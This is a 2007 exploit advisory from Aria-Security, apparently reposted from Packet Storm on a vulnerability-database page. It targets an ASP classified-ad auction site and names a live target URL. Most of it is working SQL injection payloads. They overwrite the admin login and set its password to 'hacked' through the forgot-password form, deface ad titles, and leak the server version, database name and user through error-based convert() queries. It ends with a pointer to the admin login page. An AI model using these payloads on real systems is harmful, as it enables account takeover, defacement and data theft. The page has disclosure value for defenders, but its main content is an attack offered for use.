Lucene search
K

nahc-sql.txt

🗓️ 27 Nov 2007 00:00:00Reported by aria-security.netType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 27 Views

Security advisory for Aria-Security website with SQL Injection vulnerabilitie

Code
`Aria-Security Team  
http://Aria-Security.Net  
------------------------------------------  
Original Advisory @ http://aria-security.net/forum/showthread.php?p=1111  
Try it online @ http://ads.netauctionhelp.com  
  
  
needed tables:  
  
tblMember.id  
tblMember.login  
tblMember.pswd  
  
Vulnarable Page: Login.asp  
Run this query for Forget Password  
-1' UPDATE tblMember Set login= 'admin' where(id='1');--  
-1' UPDATE tblMember set pswd= 'hacked' Where(id= '1');--  
  
  
there it is, admin with the password hacked  
  
------------------------------------------------------------------------------------  
these may help the attacker to get more info in the search.asp page  
  
/search.asp?sort=ni&category=&categoryname=&kwsearc h=&nsearch=[SQL Injection]  
  
  
tblAd.id,tblAd.imagepath,tblAd.aspectratio,tblAd.t itle,tblAd.zip,tblAd.state,tblAd.startdate'  
  
  
example: -1' update tblAd set title= 'hacked' where(id='1');--  
site.com/addetl.asp?id=1 will say HACKED.  
  
1' or 1=convert(int,@@version)--  
1' or 1=convert(int,@@servername)--  
1' or 1=convert(int,db_name())--  
1' or 1=convert(int,user_name())--  
1' or 1=convert(int,system_user)--  
  
  
hint: /auctionAdmin/admLogin.asp ;)  
  
  
Greetz: AurA  
Credits goes to Aria-Security Team  
Regards,  
The-0utl4w  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation